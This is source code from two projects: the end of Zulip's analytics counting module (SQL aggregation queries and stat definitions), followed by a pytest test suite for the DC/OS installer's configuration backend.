        # TODO: Add support for updating installation data after
        # changing an individual realm's values.
        installationcount_query = SQL("""
            INSERT INTO analytics_installationcount
                (value, property, subgroup, end_time)
            SELECT
                sum(value), %(property)s, analytics_realmcount.subgroup, %(end_time)s
            FROM analytics_realmcount
            WHERE
                property = %(property)s AND
                end_time = %(end_time)s
            GROUP BY analytics_realmcount.subgroup
        """)
        start = time.time()
        cursor.execute(installationcount_query, {
            'property': stat.property,
            'end_time': end_time,
        })
        end = time.time()
        logger.info(
            "%s InstallationCount aggregation (%dms/%sr)",
            stat.property, (end - start) * 1000, cursor.rowcount,
        )

    cursor.close()
## Utility functions called from outside counts.py ##
# called from zerver/lib/actions.py; should not throw any errors
def do_increment_logging_stat(zerver_object: Union[Realm, UserProfile, Stream], stat: CountStat,
                              subgroup: Optional[Union[str, int, bool]], event_time: datetime,
                              increment: int=1) -> None:
    """Add `increment` to the logging-stat bucket containing `event_time`.

    The target table (and hence which id columns to fill in) comes from the
    stat's DataCollector; the bucket is the hour or day ending at or after
    `event_time`.  Called from zerver/lib/actions.py; should not throw.
    """
    if not increment:
        # Nothing to record; skip the row lookup entirely.
        return

    output_table = stat.data_collector.output_table
    if output_table == RealmCount:
        id_args = {'realm': zerver_object}
    elif output_table == UserCount:
        id_args = {'realm': zerver_object.realm, 'user': zerver_object}
    else:  # StreamCount
        id_args = {'realm': zerver_object.realm, 'stream': zerver_object}

    # Buckets are labeled by the time they *end*, so round the event up.
    ceiling = ceiling_to_day if stat.frequency == CountStat.DAY else ceiling_to_hour
    end_time = ceiling(event_time)

    row, created = output_table.objects.get_or_create(
        property=stat.property, subgroup=subgroup, end_time=end_time,
        defaults={'value': increment}, **id_args)
    if not created:
        # Row already existed: push the addition into SQL via an
        # F-expression so concurrent increments don't clobber each other.
        row.value = F('value') + increment
        row.save(update_fields=['value'])
def do_drop_all_analytics_tables() -> None:
    """Wipe every analytics table, including the FillState bookkeeping."""
    # Detail tables first, then aggregates, then the fill state.
    for model in (UserCount, StreamCount, RealmCount, InstallationCount, FillState):
        model.objects.all().delete()
def do_drop_single_stat(property: str) -> None:
    """Delete all stored rows (and the fill state) for one stat property."""
    for model in (UserCount, StreamCount, RealmCount, InstallationCount, FillState):
        model.objects.filter(property=property).delete()
## DataCollector-level operations ##
QueryFn = Callable[[Dict[str, Composable]], Composable]
def do_pull_by_sql_query(
    property: str,
    start_time: datetime,
    end_time: datetime,
    query: QueryFn,
    group_by: Optional[Tuple[models.Model, str]],
) -> int:
    """Run one analytics INSERT ... SELECT query and return rows inserted.

    `group_by`, when given, is a (model, column) pair whose column becomes
    the subgroup of the inserted rows.
    """
    if group_by is None:
        subgroup = SQL('NULL')
        group_by_clause = SQL('')
    else:
        subgroup = Identifier(group_by[0]._meta.db_table, group_by[1])
        group_by_clause = SQL(', {}').format(subgroup)

    # The subgroup / group-by fragments are spliced into the SQL text rather
    # than passed as params, because cursor.execute will reject a
    # group_by_clause given as a param.  The datetimes *are* passed as params
    # so the driver handles the python-datetime -> SQL conversion for us.
    composed_query = query({
        'subgroup': subgroup,
        'group_by_clause': group_by_clause,
    })
    with connection.cursor() as cursor:
        cursor.execute(composed_query, {
            'property': property,
            'time_start': start_time,
            'time_end': end_time,
        })
        return cursor.rowcount
def sql_data_collector(
    output_table: Type[BaseCount],
    query: QueryFn,
    group_by: Optional[Tuple[models.Model, str]],
) -> DataCollector:
    """Build a DataCollector whose pull_function executes `query` via
    do_pull_by_sql_query and writes into `output_table`."""
    def pull_function(property: str, start_time: datetime, end_time: datetime,
                      realm: Optional[Realm] = None) -> int:
        # `realm` is accepted only so this matches the pull-function
        # signature DataCollector expects (cf. do_pull_minutes_active); any
        # realm filtering was already baked into `query`, so it is unused.
        return do_pull_by_sql_query(property, start_time, end_time, query, group_by)
    return DataCollector(output_table, pull_function)
def do_pull_minutes_active(property: str, start_time: datetime, end_time: datetime,
                           realm: Optional[Realm] = None) -> int:
    """Write per-user minutes-active UserCount rows for one time bucket.

    Sums each user's UserActivityInterval overlap with
    [start_time, end_time) and records one row per user who was active for
    at least a full minute.  Returns the number of rows inserted.
    """
    # Note: .values_list() ignores .select_related() (per Django docs), so
    # the select_related('user_profile') call that used to be chained here
    # was a no-op and has been removed; this is a single query either way.
    user_activity_intervals = UserActivityInterval.objects.filter(
        end__gt=start_time, start__lt=end_time,
    ).values_list(
        'user_profile_id', 'user_profile__realm_id', 'start', 'end')

    seconds_active: Dict[Tuple[int, int], float] = defaultdict(float)
    for user_id, realm_id, interval_start, interval_end in user_activity_intervals:
        if realm is None or realm.id == realm_id:
            # Clip the interval to the bucket before measuring it.
            start = max(start_time, interval_start)
            end = min(end_time, interval_end)
            seconds_active[(user_id, realm_id)] += (end - start).total_seconds()

    rows = [UserCount(user_id=ids[0], realm_id=ids[1], property=property,
                      end_time=end_time, value=int(seconds // 60))
            for ids, seconds in seconds_active.items() if seconds >= 60]
    UserCount.objects.bulk_create(rows)
    return len(rows)
def count_message_by_user_query(realm: Optional[Realm]) -> QueryFn:
    """QueryFn inserting per-sender message counts into analytics_usercount.

    Counts messages sent in [time_start, time_end) by users who joined
    before time_end; {subgroup}/{group_by_clause} are filled in later by
    do_pull_by_sql_query.
    """
    if realm is None:
        realm_clause = SQL("")
    else:
        realm_clause = SQL("zerver_userprofile.realm_id = {} AND").format(Literal(realm.id))
    return lambda kwargs: SQL("""
        INSERT INTO analytics_usercount
            (user_id, realm_id, value, property, subgroup, end_time)
        SELECT
            zerver_userprofile.id, zerver_userprofile.realm_id, count(*),
            %(property)s, {subgroup}, %(time_end)s
        FROM zerver_userprofile
        JOIN zerver_message
        ON
            zerver_userprofile.id = zerver_message.sender_id
        WHERE
            zerver_userprofile.date_joined < %(time_end)s AND
            zerver_message.date_sent >= %(time_start)s AND
            {realm_clause}
            zerver_message.date_sent < %(time_end)s
        GROUP BY zerver_userprofile.id {group_by_clause}
    """).format(**kwargs, realm_clause=realm_clause)
# Note: ignores the group_by / group_by_clause.
def count_message_type_by_user_query(realm: Optional[Realm]) -> QueryFn:
    """QueryFn counting messages per sender, subgrouped by message type
    (private_message / huddle_message / private_stream / public_stream).

    The subgroup comes from the inner SELECT's CASE expression, so the
    caller-provided group_by / group_by_clause is ignored (see the note
    above this function).
    """
    if realm is None:
        realm_clause = SQL("")
    else:
        realm_clause = SQL("zerver_userprofile.realm_id = {} AND").format(Literal(realm.id))
    return lambda kwargs: SQL("""
        INSERT INTO analytics_usercount
            (realm_id, user_id, value, property, subgroup, end_time)
        SELECT realm_id, id, SUM(count) AS value, %(property)s, message_type, %(time_end)s
        FROM
        (
            SELECT zerver_userprofile.realm_id, zerver_userprofile.id, count(*),
            CASE WHEN
                zerver_recipient.type = 1 THEN 'private_message'
            WHEN
                zerver_recipient.type = 3 THEN 'huddle_message'
            WHEN
                zerver_stream.invite_only = TRUE THEN 'private_stream'
            ELSE 'public_stream'
            END
            message_type
            FROM zerver_userprofile
            JOIN zerver_message
            ON
                zerver_userprofile.id = zerver_message.sender_id AND
                zerver_message.date_sent >= %(time_start)s AND
                {realm_clause}
                zerver_message.date_sent < %(time_end)s
            JOIN zerver_recipient
            ON
                zerver_message.recipient_id = zerver_recipient.id
            LEFT JOIN zerver_stream
            ON
                zerver_recipient.type_id = zerver_stream.id
            GROUP BY
                zerver_userprofile.realm_id, zerver_userprofile.id,
                zerver_recipient.type, zerver_stream.invite_only
        ) AS subquery
        GROUP BY realm_id, id, message_type
    """).format(**kwargs, realm_clause=realm_clause)
# This query joins to the UserProfile table since all current queries that
# use this also subgroup on UserProfile.is_bot. If in the future there is a
# stat that counts messages by stream and doesn't need the UserProfile
# table, consider writing a new query for efficiency.
def count_message_by_stream_query(realm: Optional[Realm]) -> QueryFn:
    """QueryFn counting messages sent to each stream in [time_start, time_end).

    Joins through UserProfile because the current consumers subgroup on
    UserProfile.is_bot (see the comment above this function).
    """
    if realm is None:
        realm_clause = SQL("")
    else:
        realm_clause = SQL("zerver_stream.realm_id = {} AND").format(Literal(realm.id))
    return lambda kwargs: SQL("""
        INSERT INTO analytics_streamcount
            (stream_id, realm_id, value, property, subgroup, end_time)
        SELECT
            zerver_stream.id, zerver_stream.realm_id, count(*), %(property)s, {subgroup}, %(time_end)s
        FROM zerver_stream
        JOIN zerver_recipient
        ON
            zerver_stream.id = zerver_recipient.type_id
        JOIN zerver_message
        ON
            zerver_recipient.id = zerver_message.recipient_id
        JOIN zerver_userprofile
        ON
            zerver_message.sender_id = zerver_userprofile.id
        WHERE
            zerver_stream.date_created < %(time_end)s AND
            zerver_recipient.type = 2 AND
            zerver_message.date_sent >= %(time_start)s AND
            {realm_clause}
            zerver_message.date_sent < %(time_end)s
        GROUP BY zerver_stream.id {group_by_clause}
    """).format(**kwargs, realm_clause=realm_clause)
# Hardcodes the query needed by active_users:is_bot:day, since that is
# currently the only stat that uses this.
def count_user_by_realm_query(realm: Optional[Realm]) -> QueryFn:
    """QueryFn counting active users that joined each realm in
    [time_start, time_end).

    Hardcoded for active_users:is_bot:day (see the comment above this
    function), which runs it with interval=TIMEDELTA_MAX so every
    currently-active user is counted each day.
    """
    if realm is None:
        realm_clause = SQL("")
    else:
        realm_clause = SQL("zerver_userprofile.realm_id = {} AND").format(Literal(realm.id))
    return lambda kwargs: SQL("""
        INSERT INTO analytics_realmcount
            (realm_id, value, property, subgroup, end_time)
        SELECT
            zerver_realm.id, count(*), %(property)s, {subgroup}, %(time_end)s
        FROM zerver_realm
        JOIN zerver_userprofile
        ON
            zerver_realm.id = zerver_userprofile.realm_id
        WHERE
            zerver_realm.date_created < %(time_end)s AND
            zerver_userprofile.date_joined >= %(time_start)s AND
            zerver_userprofile.date_joined < %(time_end)s AND
            {realm_clause}
            zerver_userprofile.is_active = TRUE
        GROUP BY zerver_realm.id {group_by_clause}
    """).format(**kwargs, realm_clause=realm_clause)
# Currently hardcodes the query needed for active_users_audit:is_bot:day.
# Assumes that a user cannot have two RealmAuditLog entries with the same event_time and
# event_type in [RealmAuditLog.USER_CREATED, USER_DEACTIVATED, etc].
# In particular, it's important to ensure that migrations don't cause that to happen.
def check_realmauditlog_by_user_query(realm: Optional[Realm]) -> QueryFn:
    """QueryFn writing value=1 analytics_usercount rows for users whose most
    recent RealmAuditLog lifecycle event before time_end leaves them active
    (created / activated / reactivated).

    See the assumptions documented above this function about event_time
    uniqueness per user.
    """
    if realm is None:
        realm_clause = SQL("")
    else:
        realm_clause = SQL("realm_id = {} AND").format(Literal(realm.id))
    return lambda kwargs: SQL("""
        INSERT INTO analytics_usercount
            (user_id, realm_id, value, property, subgroup, end_time)
        SELECT
            ral1.modified_user_id, ral1.realm_id, 1, %(property)s, {subgroup}, %(time_end)s
        FROM zerver_realmauditlog ral1
        JOIN (
            SELECT modified_user_id, max(event_time) AS max_event_time
            FROM zerver_realmauditlog
            WHERE
                event_type in ({user_created}, {user_activated}, {user_deactivated}, {user_reactivated}) AND
                {realm_clause}
                event_time < %(time_end)s
            GROUP BY modified_user_id
        ) ral2
        ON
            ral1.event_time = max_event_time AND
            ral1.modified_user_id = ral2.modified_user_id
        JOIN zerver_userprofile
        ON
            ral1.modified_user_id = zerver_userprofile.id
        WHERE
            ral1.event_type in ({user_created}, {user_activated}, {user_reactivated})
    """).format(
        **kwargs,
        user_created=Literal(RealmAuditLog.USER_CREATED),
        user_activated=Literal(RealmAuditLog.USER_ACTIVATED),
        user_deactivated=Literal(RealmAuditLog.USER_DEACTIVATED),
        user_reactivated=Literal(RealmAuditLog.USER_REACTIVATED),
        realm_clause=realm_clause,
    )
def check_useractivityinterval_by_user_query(realm: Optional[Realm]) -> QueryFn:
    """QueryFn writing value=1 per user with at least one
    UserActivityInterval overlapping [time_start, time_end).

    Used by the 1day_actives::day and 15day_actives::day stats.
    """
    if realm is None:
        realm_clause = SQL("")
    else:
        realm_clause = SQL("zerver_userprofile.realm_id = {} AND").format(Literal(realm.id))
    return lambda kwargs: SQL("""
        INSERT INTO analytics_usercount
            (user_id, realm_id, value, property, subgroup, end_time)
        SELECT
            zerver_userprofile.id, zerver_userprofile.realm_id, 1, %(property)s, {subgroup}, %(time_end)s
        FROM zerver_userprofile
        JOIN zerver_useractivityinterval
        ON
            zerver_userprofile.id = zerver_useractivityinterval.user_profile_id
        WHERE
            zerver_useractivityinterval.end >= %(time_start)s AND
            {realm_clause}
            zerver_useractivityinterval.start < %(time_end)s
        GROUP BY zerver_userprofile.id {group_by_clause}
    """).format(**kwargs, realm_clause=realm_clause)
def count_realm_active_humans_query(realm: Optional[Realm]) -> QueryFn:
    """QueryFn counting, per realm, users that are both active humans
    (per 'active_users_audit:is_bot:day' with subgroup 'false') and
    15-day actives at time_end.

    This is why realm_active_humans::day is a DependentCountStat on those
    two properties — their rows must exist before this query runs.
    """
    if realm is None:
        realm_clause = SQL("")
    else:
        realm_clause = SQL("realm_id = {} AND").format(Literal(realm.id))
    return lambda kwargs: SQL("""
        INSERT INTO analytics_realmcount
            (realm_id, value, property, subgroup, end_time)
        SELECT
            usercount1.realm_id, count(*), %(property)s, NULL, %(time_end)s
        FROM (
            SELECT realm_id, user_id
            FROM analytics_usercount
            WHERE
                property = 'active_users_audit:is_bot:day' AND
                subgroup = 'false' AND
                {realm_clause}
                end_time = %(time_end)s
        ) usercount1
        JOIN (
            SELECT realm_id, user_id
            FROM analytics_usercount
            WHERE
                property = '15day_actives::day' AND
                {realm_clause}
                end_time = %(time_end)s
        ) usercount2
        ON
            usercount1.user_id = usercount2.user_id
        GROUP BY usercount1.realm_id
    """).format(**kwargs, realm_clause=realm_clause)
# Currently unused and untested
def count_stream_by_realm_query(kwargs: Dict[str, Composable]) -> Composable:
    """QueryFn counting streams created per realm in [time_start, time_end).

    Fixes two defects in the previous version: it was a lambda assigned to a
    name (PEP 8 E731), and the SQL had a dangling ``AND`` between the JOIN
    condition and the WHERE clause, which made the statement syntactically
    invalid.
    """
    return SQL("""
        INSERT INTO analytics_realmcount
            (realm_id, value, property, subgroup, end_time)
        SELECT
            zerver_realm.id, count(*), %(property)s, {subgroup}, %(time_end)s
        FROM zerver_realm
        JOIN zerver_stream
        ON
            zerver_realm.id = zerver_stream.realm_id
        WHERE
            zerver_realm.date_created < %(time_end)s AND
            zerver_stream.date_created >= %(time_start)s AND
            zerver_stream.date_created < %(time_end)s
        GROUP BY zerver_realm.id {group_by_clause}
    """).format(**kwargs)
def get_count_stats(realm: Optional[Realm]=None) -> Dict[str, CountStat]:
    """Return the ordered mapping of stat property -> CountStat.

    When `realm` is given, the SQL-backed stats are scoped to that realm;
    LoggingCountStats are unaffected (see the note inline).  Order matters:
    DependentCountStats must appear after their dependencies.
    """
    ## CountStat declarations ##

    count_stats_ = [
        # Messages Sent stats
        # Stats that count the number of messages sent in various ways.
        # These are also the set of stats that read from the Message table.
        CountStat('messages_sent:is_bot:hour',
                  sql_data_collector(UserCount, count_message_by_user_query(
                      realm), (UserProfile, 'is_bot')),
                  CountStat.HOUR),
        CountStat('messages_sent:message_type:day',
                  sql_data_collector(
                      UserCount, count_message_type_by_user_query(realm), None),
                  CountStat.DAY),
        CountStat('messages_sent:client:day',
                  sql_data_collector(UserCount, count_message_by_user_query(realm),
                                     (Message, 'sending_client_id')), CountStat.DAY),
        CountStat('messages_in_stream:is_bot:day',
                  sql_data_collector(StreamCount, count_message_by_stream_query(realm),
                                     (UserProfile, 'is_bot')), CountStat.DAY),

        # Number of Users stats
        # Stats that count the number of active users in the UserProfile.is_active sense.

        # 'active_users_audit:is_bot:day' is the canonical record of which users were
        # active on which days (in the UserProfile.is_active sense).
        # Important that this stay a daily stat, so that 'realm_active_humans::day' works as expected.
        CountStat('active_users_audit:is_bot:day',
                  sql_data_collector(UserCount, check_realmauditlog_by_user_query(
                      realm), (UserProfile, 'is_bot')),
                  CountStat.DAY),

        # Important note: LoggingCountStat objects aren't passed the
        # Realm argument, because by nature they have a logging
        # structure, not a pull-from-database structure, so there's no
        # way to compute them for a single realm after the fact (the
        # use case for passing a Realm argument).

        # Sanity check on 'active_users_audit:is_bot:day', and a archetype for future LoggingCountStats.
        # In RealmCount, 'active_users_audit:is_bot:day' should be the partial
        # sum sequence of 'active_users_log:is_bot:day', for any realm that
        # started after the latter stat was introduced.
        LoggingCountStat('active_users_log:is_bot:day',
                         RealmCount, CountStat.DAY),
        # Another sanity check on 'active_users_audit:is_bot:day'. Is only an
        # approximation, e.g. if a user is deactivated between the end of the
        # day and when this stat is run, they won't be counted. However, is the
        # simplest of the three to inspect by hand.
        CountStat('active_users:is_bot:day',
                  sql_data_collector(RealmCount, count_user_by_realm_query(realm), (UserProfile, 'is_bot')),
                  CountStat.DAY, interval=TIMEDELTA_MAX),

        # Messages read stats.  messages_read::hour is the total
        # number of messages read, whereas
        # messages_read_interactions::hour tries to count the total
        # number of UI interactions resulting in messages being marked
        # as read (imperfect because of batching of some request
        # types, but less likely to be overwhelmed by a single bulk
        # operation).
        LoggingCountStat('messages_read::hour', UserCount, CountStat.HOUR),
        LoggingCountStat('messages_read_interactions::hour', UserCount, CountStat.HOUR),

        # User Activity stats
        # Stats that measure user activity in the UserActivityInterval sense.
        CountStat('1day_actives::day',
                  sql_data_collector(
                      UserCount, check_useractivityinterval_by_user_query(realm), None),
                  CountStat.DAY, interval=timedelta(days=1)-UserActivityInterval.MIN_INTERVAL_LENGTH),
        CountStat('15day_actives::day',
                  sql_data_collector(
                      UserCount, check_useractivityinterval_by_user_query(realm), None),
                  CountStat.DAY, interval=timedelta(days=15)-UserActivityInterval.MIN_INTERVAL_LENGTH),
        CountStat('minutes_active::day', DataCollector(
            UserCount, do_pull_minutes_active), CountStat.DAY),

        # Rate limiting stats

        # Used to limit the number of invitation emails sent by a realm
        LoggingCountStat('invites_sent::day', RealmCount, CountStat.DAY),

        # Dependent stats
        # Must come after their dependencies.

        # Canonical account of the number of active humans in a realm on each day.
        DependentCountStat('realm_active_humans::day',
                           sql_data_collector(
                               RealmCount, count_realm_active_humans_query(realm), None),
                           CountStat.DAY,
                           dependencies=['active_users_audit:is_bot:day', '15day_actives::day']),
    ]

    return OrderedDict([(stat.property, stat) for stat in count_stats_])
# To avoid refactoring for now COUNT_STATS can be used as before: the
# module-level mapping of all stats, computed installation-wide (realm=None).
COUNT_STATS = get_count_stats()
| shubhamdhama/zulip | analytics/lib/counts.py | Python | apache-2.0 | 29,311 |
import json
import os
import subprocess
import uuid
import passlib.hash
import pytest
import gen
import gen.build_deploy.aws
import release
from dcos_installer import backend
from dcos_installer.config import Config, make_default_config_if_needed, to_config
os.environ["BOOTSTRAP_ID"] = "12345"
@pytest.fixture(scope='module')
def config():
    """Release config from dcos-release.config.yaml; skip tests without it."""
    config_path = 'dcos-release.config.yaml'
    if not os.path.exists(config_path):
        pytest.skip("Skipping because there is no configuration in dcos-release.config.yaml")
    return release.load_config(config_path)
@pytest.fixture(scope='module')
def config_testing(config):
    """The `testing` section of the release config; skips when absent."""
    try:
        return config['testing']
    except KeyError:
        pytest.skip("Skipped because there is no `testing` configuration in dcos-release.config.yaml")
@pytest.fixture(scope='module')
def config_aws(config_testing):
    """The `testing.aws` section of the release config; skips when absent."""
    try:
        return config_testing['aws']
    except KeyError:
        pytest.skip("Skipped because there is no `testing.aws` configuration in dcos-release.config.yaml")
def test_password_hash():
    """The --hash-password CLI output must verify against the original password."""
    plaintext = 'DcosTestingPassword!@#'
    # The installer only writes the hash to STDOUT.
    raw_output = subprocess.check_output(['dcos_installer', '--hash-password', plaintext])
    print(raw_output)
    hashed = raw_output.decode('ascii').strip('\n')
    assert passlib.hash.sha512_crypt.verify(plaintext, hashed), 'Hash does not match password'
def test_set_superuser_password(tmpdir):
    """Test that --set-superuser-hash works"""
    with tmpdir.as_cwd():
        tmpdir.join('genconf').ensure(dir=True)

        # TODO(cmaloney): Add tests for the behavior around a non-existent config.yaml

        # Setting in a non-empty config.yaml which has no password set
        make_default_config_if_needed('genconf/config.yaml')
        assert 'superuser_password_hash' not in Config('genconf/config.yaml').config

        # Set the password
        create_fake_build_artifacts(tmpdir)
        subprocess.check_call(['dcos_installer', '--set-superuser-password', 'foo'], cwd=str(tmpdir))

        # Check that config.yaml has the password set
        # NOTE(review): this local `config` shadows the module-level `config`
        # pytest fixture; harmless here since the fixture is not requested.
        config = Config('genconf/config.yaml')
        assert passlib.hash.sha512_crypt.verify('foo', config['superuser_password_hash'])
def test_generate_node_upgrade_script(tmpdir, monkeypatch):
    """--generate-node-upgrade-script must print a dcos_node_upgrade.sh URL,
    and must fail with a clear message when the from-version is omitted."""
    upgrade_config = """
---
# The name of your DC/OS cluster. Visable in the DC/OS user interface.
cluster_name: 'DC/OS'
master_discovery: static
exhibitor_storage_backend: 'static'
resolvers:
- 8.8.8.8
- 8.8.4.4
ssh_port: 22
process_timeout: 10000
bootstrap_url: file:///opt/dcos_install_tmp
master_list: ['10.0.0.1', '10.0.0.2', '10.0.0.5']
"""
    monkeypatch.setenv('BOOTSTRAP_VARIANT', '')
    create_config(upgrade_config, tmpdir)
    create_fake_build_artifacts(tmpdir)

    # Happy path: the last output line ends with the generated script name.
    output = subprocess.check_output(['dcos_installer', '--generate-node-upgrade-script', 'fake'], cwd=str(tmpdir))
    assert output.decode('utf-8').splitlines()[-1].split("Node upgrade script URL: ", 1)[1]\
        .endswith("dcos_node_upgrade.sh")

    # Omitting the installed version must fail with a helpful error message.
    try:
        subprocess.check_output(['dcos_installer', '--generate-node-upgrade-script'], cwd=str(tmpdir))
    except subprocess.CalledProcessError as e:
        print(e.output)
        assert e.output.decode('ascii') == "Must provide the version of the cluster upgrading from\n"
    else:
        raise Exception("Test passed, this should not pass without specifying a version number")
def test_version(monkeypatch):
    """`dcos_installer --version` reports the version plus the bootstrap variant."""
    monkeypatch.setenv('BOOTSTRAP_VARIANT', 'some-variant')
    raw_version = subprocess.check_output(['dcos_installer', '--version'])
    expected = {
        'version': '1.9-dev',
        'variant': 'some-variant'
    }
    assert json.loads(raw_version.decode()) == expected
def test_good_create_config_from_post(tmpdir):
    """
    Test that it creates the config
    """
    # Create a temp config
    workspace = tmpdir.strpath
    temp_config_path = workspace + '/config.yaml'
    make_default_config_if_needed(temp_config_path)

    # Bug fix: the ip-detect file handle used to be left open with no
    # flush/close, so the buffered contents were not guaranteed to be on
    # disk when the backend later read the file.  A context manager closes
    # (and therefore flushes) it deterministically.
    temp_ip_detect_path = workspace + '/ip-detect'
    with open(temp_ip_detect_path, "w") as f:
        f.write("#/bin/bash foo")

    good_post_data = {
        "agent_list": ["10.0.0.2"],
        "master_list": ["10.0.0.1"],
        "cluster_name": "Good Test",
        "resolvers": ["4.4.4.4"],
        "ip_detect_filename": temp_ip_detect_path
    }
    expected_good_messages = {}

    create_fake_build_artifacts(tmpdir)
    with tmpdir.as_cwd():
        messages = backend.create_config_from_post(
            post_data=good_post_data,
            config_path=temp_config_path)

    assert messages == expected_good_messages
def test_bad_create_config_from_post(tmpdir):
    """Invalid post data must be rejected with per-field validation messages."""
    # Create a temp config
    workspace = tmpdir.strpath
    temp_config_path = workspace + '/config.yaml'
    make_default_config_if_needed(temp_config_path)

    bad_post_data = {
        "agent_list": "foo",
        "master_list": ["foo"],
    }
    expected_bad_messages = {
        "agent_list": "Must be a JSON formatted list, but couldn't be parsed the given value `foo` as "
                      "one because of: Expecting value: line 1 column 1 (char 0)",
        "master_list": 'Invalid IPv4 addresses in list: foo',
    }
    create_fake_build_artifacts(tmpdir)
    with tmpdir.as_cwd():
        messages = backend.create_config_from_post(
            post_data=bad_post_data,
            config_path=temp_config_path)
    assert messages == expected_bad_messages
def test_do_validate_config(tmpdir, monkeypatch):
    """Validating a bare default config must report every missing required field."""
    monkeypatch.setenv('BOOTSTRAP_VARIANT', 'test_variant')

    # Create a temp config
    genconf_dir = tmpdir.join('genconf')
    genconf_dir.ensure(dir=True)
    temp_config_path = str(genconf_dir.join('config.yaml'))

    # Initialize with defaults
    make_default_config_if_needed(temp_config_path)
    create_fake_build_artifacts(tmpdir)

    expected_output = {
        'ip_detect_contents': 'ip-detect script `genconf/ip-detect` must exist',
        'ssh_user': 'Must set ssh_user, no way to calculate value.',
        'master_list': 'Must set master_list, no way to calculate value.',
        'ssh_key_path': 'could not find ssh private key: genconf/ssh_key'
    }
    with tmpdir.as_cwd():
        assert Config(config_path='genconf/config.yaml').do_validate(include_ssh=True) == expected_output
def test_get_config(tmpdir):
    """A default-generated config must round-trip into Config with known values."""
    workspace = tmpdir.strpath
    temp_config_path = workspace + '/config.yaml'

    expected_data = {
        'cluster_name': 'DC/OS',
        'master_discovery': 'static',
        'exhibitor_storage_backend': 'static',
        'resolvers': ['8.8.8.8', '8.8.4.4'],
        'ssh_port': 22,
        'process_timeout': 10000,
        'bootstrap_url': 'file:///opt/dcos_install_tmp'
    }

    make_default_config_if_needed(temp_config_path)
    config = Config(temp_config_path)
    assert expected_data == config.config
def test_determine_config_type(tmpdir):
    """A freshly generated default config must be classified as 'minimal'."""
    # Ensure the default created config is of simple type
    config_path = tmpdir.strpath + '/config.yaml'
    make_default_config_if_needed(config_path)
    assert backend.determine_config_type(config_path=config_path) == {
        'message': '',
        'type': 'minimal',
    }
def test_success():
    """backend.success reports the master URL and counts, or HTTP 400 when
    the host lists are empty."""
    mock_config = to_config({
        'master_list': ['10.0.0.1', '10.0.0.2', '10.0.0.5'],
        'agent_list': ['10.0.0.3', '10.0.0.4']
    })
    got_output, code = backend.success(mock_config)
    assert got_output == {
        "success": "http://10.0.0.1",
        "master_count": 3,
        "agent_count": 2
    }
    assert code == 200

    # Blanking the host lists must yield an empty success URL and a 400.
    mock_config.update({'master_list': '', 'agent_list': ''})
    bad_out, bad_code = backend.success(mock_config)
    assert bad_out == {
        "success": "",
        "master_count": 0,
        "agent_count": 0
    }
    assert bad_code == 400
def test_accept_overrides_for_undefined_config_params(tmpdir):
    """Unknown config keys posted to the backend must be accepted verbatim."""
    temp_config_path = tmpdir.strpath + '/config.yaml'
    param = ('fake_test_param_name', 'fake_test_param_value')
    make_default_config_if_needed(temp_config_path)
    create_fake_build_artifacts(tmpdir)
    with tmpdir.as_cwd():
        messages = backend.create_config_from_post(
            post_data=dict([param]),
            config_path=temp_config_path)

    assert not messages, "unexpected validation error: {}".format(messages)
    assert Config(config_path=temp_config_path)[param[0]] == param[1]
# Minimal config that exercises the full do_configure pipeline.
simple_full_config = """---
cluster_name: DC/OS
master_discovery: static
exhibitor_storage_backend: static
master_list:
- 127.0.0.1
bootstrap_url: http://example.com
"""


def test_do_configure(tmpdir, monkeypatch):
    """A complete minimal config must pass backend.do_configure (returns 0)."""
    monkeypatch.setenv('BOOTSTRAP_VARIANT', 'test_variant')
    create_config(simple_full_config, tmpdir)
    create_fake_build_artifacts(tmpdir)
    with tmpdir.as_cwd():
        assert backend.do_configure(config_path='genconf/config.yaml') == 0
# Config for do_aws_cf_configure with template upload disabled, so no real
# AWS/S3 credentials are required.
aws_base_config = """---
# NOTE: Taking advantage of what isn't talked about not being validated so we don't need valid AWS /
# s3 credentials in this configuration.
aws_template_storage_bucket: psychic
aws_template_storage_bucket_path: mofo-the-gorilla
aws_template_storage_region_name: us-west-2
aws_template_upload: false
"""


def test_do_aws_configure(tmpdir, monkeypatch):
    """backend.do_aws_cf_configure must succeed (exit 0) with upload disabled."""
    monkeypatch.setenv('BOOTSTRAP_VARIANT', 'test_variant')
    create_config(aws_base_config, tmpdir)
    create_fake_build_artifacts(tmpdir)
    with tmpdir.as_cwd():
        assert backend.do_aws_cf_configure() == 0
# Template for a config that really uploads to S3; filled in from the
# `testing.aws` section of dcos-release.config.yaml.
valid_storage_config = """---
master_list:
- 127.0.0.1
aws_template_storage_access_key_id: {key_id}
aws_template_storage_bucket: {bucket}
aws_template_storage_bucket_path: mofo-the-gorilla
aws_template_storage_secret_access_key: {access_key}
aws_template_upload: true
"""


def test_do_aws_cf_configure_valid_storage_config(config_aws, tmpdir, monkeypatch):
    """End-to-end check of do_aws_cf_configure against a throwaway S3 bucket."""
    monkeypatch.setenv('BOOTSTRAP_VARIANT', 'test_variant')
    session = gen.build_deploy.aws.get_test_session(config_aws)
    s3 = session.resource('s3')
    bucket = str(uuid.uuid4())
    s3_bucket = s3.Bucket(bucket)
    s3_bucket.create(CreateBucketConfiguration={'LocationConstraint': config_aws['region_name']})

    try:
        config_str = valid_storage_config.format(
            key_id=config_aws["access_key_id"],
            bucket=bucket,
            access_key=config_aws["secret_access_key"])
        create_config(config_str, tmpdir)
        create_fake_build_artifacts(tmpdir)
        with tmpdir.as_cwd():
            assert backend.do_aws_cf_configure() == 0
        # TODO: add an assertion that the config that was resolved inside do_aws_cf_configure
        # ended up with the correct region where the above testing bucket was created.
    finally:
        # Empty the bucket before deleting it: S3 refuses to delete
        # non-empty buckets, so cleanup must happen even if the test fails.
        objects = [{'Key': o.key} for o in s3_bucket.objects.all()]
        s3_bucket.delete_objects(Delete={'Objects': objects})
        s3_bucket.delete()
def create_config(config_str, tmpdir):
    """Write `config_str` as genconf/config.yaml (plus a stub ip-detect) under tmpdir."""
    genconf_dir = tmpdir.ensure('genconf', dir=True)
    genconf_dir.join('config.yaml').write(config_str)
    genconf_dir.join('ip-detect').write('#!/bin/bash\necho 127.0.0.1')
def create_fake_build_artifacts(tmpdir):
    """Populate tmpdir with the minimal artifact tree the installer expects
    (bootstrap tarball, active/latest metadata, and one package tarball)."""
    bootstrap_dir = tmpdir.join('artifacts/bootstrap')
    bootstrap_dir.ensure(dir=True)
    bootstrap_dir.join('12345.bootstrap.tar.xz').write('contents_of_bootstrap', ensure=True)
    bootstrap_dir.join('12345.active.json').write('["package--version"]', ensure=True)
    bootstrap_dir.join('test_variant.bootstrap.latest').write("12345")

